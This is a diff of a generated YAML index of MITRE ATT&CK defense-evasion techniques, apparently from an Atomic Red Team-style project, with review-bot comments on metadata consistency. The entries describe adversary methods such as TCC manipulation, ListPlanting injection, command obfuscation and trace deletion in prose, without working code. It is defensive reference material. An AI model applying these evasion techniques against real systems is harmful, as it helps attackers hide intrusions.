- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12309,8 +12629,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
@@ -12346,43 +12667,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
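Review bot: T1070.004 keeps `name: 'Indicator Removal on Host: File Deletion'` (removed and re-added unchanged) and `x_mitre_version: '1.1'`, while its `modified` advances to '2024-10-15T16:33:59.107Z'. If `name` is taken from the atomic's own display name rather than from the upstream object, a comment in the generator would make that clear; if it is meant to come from upstream, confirm that the 2024 object still uses this title.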
@@ -12393,18 +12694,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests: []
T1221:
@@ -12466,7 +12785,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -12496,13 +12815,11 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12599,7 +12916,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -12662,7 +12978,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests: []
T1564.005:
@@ -12700,7 +13015,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12727,8 +13042,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -12756,7 +13069,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12800,8 +13113,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -12856,7 +13167,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -12876,7 +13187,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1036.006:
@@ -12926,7 +13236,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests: []
T1550.002:
@@ -12981,12 +13290,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13036,12 +13344,11 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13101,8 +13408,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -13119,37 +13426,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
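Review bot: the T1548.006 description changes from a double-quoted scalar to a `|+` block scalar that ends in a blank line before `kill_chain_phases:`, so the stored value now ends in two newlines, whereas the other block-scalar descriptions in this diff use `|-`. If the generator chose `|+` only because the upstream string ends with a newline, normalising to `|-` keeps the descriptions consistent and avoids a trailing-newline-only diff on the next sync. The phrase 'an overwrites file (if connected to an MDM)' in the new text reads like a typo, but it is upstream ATT&CK wording, so raise it there rather than hand-editing this generated file.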
@@ -13157,6 +13445,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -13164,7 +13454,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -13194,7 +13484,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -13240,7 +13529,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
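Review bot: the `modified` timestamp for T1055.008 moves backwards in this hunk, from '2022-04-25T14:00:00.188Z' to '2021-10-18T12:26:31.766Z', and the same regression appears for T1027.007, T1564.001, T1480.001 and T1216 further down. If the index is regenerated from a newer ATT&CK STIX bundle, an object's last-modified date should not go back in time, so either the old index carried release-stamp values (most of the replaced ones share the `14:00:00.188Z` time) that are now being replaced by per-object values, or the generator read an older bundle for these objects. Please state in the commit message which bundle version the index was built from and confirm the regression is expected.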
@@ -13285,8 +13574,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
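Review bot: T1055.008 loses both `spec_version` and `x_mitre_attack_spec_version` here, while the neighbouring T1027.007 a few lines below keeps `x_mitre_attack_spec_version: 2.1.0` and drops only `spec_version`, as do T1480.001 and T1216 further down. Dropping `spec_version` everywhere is consistent; dropping the ATT&CK spec version for one object is not. Check whether the upstream object really lacks the field or whether the generator skipped it, and if the field is meant to go, remove it uniformly.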
@@ -13331,7 +13618,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -13345,58 +13632,28 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
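Review bot: the T1055.015 object is emitted with a different key order (platforms, domains, contributors and references move from the top of the object to the bottom), so the only substantive changes in this hunk, the new `(Citation: Hexacorn Listplanting)` after "live process." and the `modified` bump to 2024-08-14, are buried inside a rewrite of the whole object. The same whole-object churn hits T1220 and T1578.001 below. If the generator now emits keys in the upstream bundle's order, fix the order once (sorted keys or a fixed field list) so future ATT&CK syncs produce reviewable diffs, and mention the ordering change in the commit message. The new citation itself is fine; the matching `Hexacorn Listplanting` entry is added to this object's `external_references` further down.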
@@ -13413,6 +13670,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -13427,21 +13687,52 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13486,9 +13777,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
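Review bot: `SaaS` is dropped from T1484's platforms along with `Azure AD`, but only `Identity Provider` is added, whereas T1550.001, T1078.004 and T1556 further down keep `SaaS` and gain both `Office Suite` and `Identity Provider`. The Azure AD / Office 365 / Google Workspace to Identity Provider / Office Suite change looks like the upstream platform consolidation, so the open question is whether removing SaaS from T1484 is also upstream or a mapping artefact in the generator. Confirm against the source bundle before merging; the version bump to 3.1 on the same lines suggests upstream, but the hunk does not show it.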
@@ -13545,8 +13835,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -13555,57 +13845,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
